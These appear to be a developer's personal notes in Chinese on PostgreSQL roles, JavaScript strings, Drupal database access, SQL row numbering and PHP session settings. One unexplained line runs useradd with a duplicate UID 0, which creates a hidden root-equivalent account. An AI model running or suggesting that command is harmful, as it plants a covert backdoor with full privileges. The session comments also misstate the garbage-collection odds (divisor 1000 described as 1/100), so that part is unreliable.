
************************************************************************************************************

任务正理：PostgreSQL  PHP模式   EA11

postgreSQL参考：http://www.postgresql.org/docs/9.5/interactive/index.html

"CREATE USER is the same as CREATE ROLE except that it implies LOGIN."
CREATE USER除了默认具有LOGIN权限之外，其他与CREATE ROLE是完全相同的。
可以为角色增加登录权限来达到与用户相同的用处

function byId(id){	return document.getElementById(id);	}
byId('link').className = 'light';  //这种写法是可行的
document.createElement(),document.createTextNode();

注意：过度使用加值操作符，会大大降低大量文本的处理效率。在组合大字符串是时，如果性能很低，可将字符串段放到数组项中，然后使用数组的join()
方法生成最终的大字符串值。

在技术上，打字时，完整的回车包含一行换行符（另起一行）和一个回车符（将回车移动到最左边）。虽然JavaScript字符串将换行(\n)作为完整的回车符
，但要组合一个字符串以返回给服务器上的cgi脚本 ，应用使用\r\n,其格式取决于cgi程序的字符串解析能力

string.split(正则表达式);  //记住这种用法









************************************************************************************************************
www.multimall.cn

卖家（vendor）  商品(wares)   订单(order)   买家（buyer） 


//drupal操作数据库

define('DRUPAL_ROOT', $_SERVER['DOCUMENT_ROOT']);
require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_DATABASE);
db_set_active('activity');

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 


************************************************************************************************************



session.name = PHPSESSID			//默认session名为PHPSESSID
session.use_trans_sid = 0			//默认为0 对每个URL启用session名=SID,不建议开启，存在安全问题
;session.save_path = "/tmp"			//session的保存路径
session.gc_probability = 1			//
session.gc_divisor = 1000			//这两个合起来就是启动GC进行管理概率的 session.gc_probability = 1/session.gc_divisor = 100 等于 百分之一的几率. 

当文件成为垃圾时，要有一百次 启动的机会才会把过期的文件（垃圾回收）。
session.gc_maxlifetime = 1440			// session的发呆时间，默认1440 成为垃圾 （被回收时间） 单位以秒计算

session.cookie_lifetime = 0			//cookie默认的生命周期，默认为0 （当关闭浏览器时在启动SESSION时就会重新生成一个新的SESSION  如果设置时间，不管是否到设定的时间，都会重新生成新的SESSION。）

session.save_handler = files			//设置session的处理方式，可以设置user自定义
session.use_cookies = 1				//sessionid在客户端采用的存储方式，置1代表使用cookie记录客户端的sessionid









